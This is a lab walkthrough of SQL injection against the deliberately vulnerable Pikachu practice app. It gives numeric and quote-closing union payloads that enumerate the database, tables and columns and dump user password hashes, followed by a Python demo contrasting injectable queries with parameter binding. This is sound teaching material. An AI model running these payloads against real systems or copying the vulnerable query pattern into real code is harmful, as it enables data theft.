yeah!
Note: do not access the target via localhost; use the machine's LAN IP instead.
Burp does not capture traffic to the loopback address or localhost by default.
Numeric injection (POST)
1. GET requests are easier to attack; here the front end restricts input with a dropdown menu.
2. Intercept the request and modify the id value:
1 and 1=1 returns normally
1 and 1=2 the query fails
3. Find the number of columns:
1 order by 2
1 order by 3
……
4. Dump the database name and the current user:
1 union select user(),database()
5. Dump the table names:
1 union select database(), group_concat(table_name) from information_schema.tables where table_schema=database()
6. Dump the column names:
1 union select database(), group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'
‘user’ keeps throwing an error; maybe someone more experienced can tell me why.
Remove the and table_name='users' part.
7. Dump the values:
1 union select database(),group_concat(username,password) from pikachu.users
admine10adc3949ba59abbe56e057f20f883e,pikachu670b14728ad9902aecba32e22fa4f6bd,teste99a18c428cb38d5f260853678922e03
String injection (GET)
The URL-encoding issue held me up for a long time.
SELECT * FROM users WHERE username='$username';
Same procedure as above.
Close the quote first:
fancy' and 1=1 --+
kobe' order by 2 --+
kobe' union select user(),database()--+
kobe' union select database(),group_concat(table_name) from information_schema.tables where table_schema='pikachu' --+
kobe' union select database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+
kobe' union select database(),group_concat(username,'~',password) from pikachu.users--+
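Why the numeric payloads in step 2 and the quote-closing payloads above work, and how parameter binding stops both, as an added example that is not code from this write-up or from the Pikachu project. It uses an in-memory SQLite table with made-up rows in place of pikachu.users, and the function names are my own.

```python
import sqlite3

# Constructed sample table standing in for pikachu.users (made-up rows, not the lab's data).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "hash_a"), (2, "pikachu", "hash_b"), (3, "test", "hash_c")])
    return conn

def vulnerable_by_id(conn, user_input):
    # Numeric injection: the id is pasted into the SQL text, so "1 and 1=2" becomes part of the WHERE clause.
    sql = f"SELECT username FROM users WHERE id = {user_input}"
    return [row[0] for row in conn.execute(sql)]

def vulnerable_by_name(conn, user_input):
    # String injection: a quote in the input closes the literal and the rest is parsed as SQL.
    sql = f"SELECT username FROM users WHERE username = '{user_input}'"
    return [row[0] for row in conn.execute(sql)]

def safe_by_id(conn, user_input):
    # Hardened: type-check first (anything but an integer raises ValueError), then bind as a parameter.
    id_value = int(user_input)
    return [row[0] for row in conn.execute("SELECT username FROM users WHERE id = ?", (id_value,))]

def safe_by_name(conn, user_input):
    # Hardened: a bound parameter is data, never syntax, so the quote cannot close the literal.
    return [row[0] for row in conn.execute("SELECT username FROM users WHERE username = ?", (user_input,))]

def run_demo():
    conn = make_db()
    results = {
        "vuln_id_true": vulnerable_by_id(conn, "1 and 1=1"),                 # ['admin']
        "vuln_id_false": vulnerable_by_id(conn, "1 and 1=2"),                # []
        "vuln_name_true": vulnerable_by_name(conn, "admin' and 1=1 --+"),    # ['admin']
        "vuln_name_false": vulnerable_by_name(conn, "admin' and 1=2 --+"),   # []
        "safe_name": safe_by_name(conn, "admin' and 1=1 --+"),               # [] (no such literal username)
    }
    try:
        safe_by_id(conn, "1 and 1=2")
        results["safe_id_rejected"] = False
    except ValueError:
        results["safe_id_rejected"] = True                                   # True
    return results

if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

SQLite has no user(), database() or information_schema, so the union-based dumping steps are not reproduced here; the boolean behaviour of "and 1=1" versus "and 1=2" is the same as in MySQL.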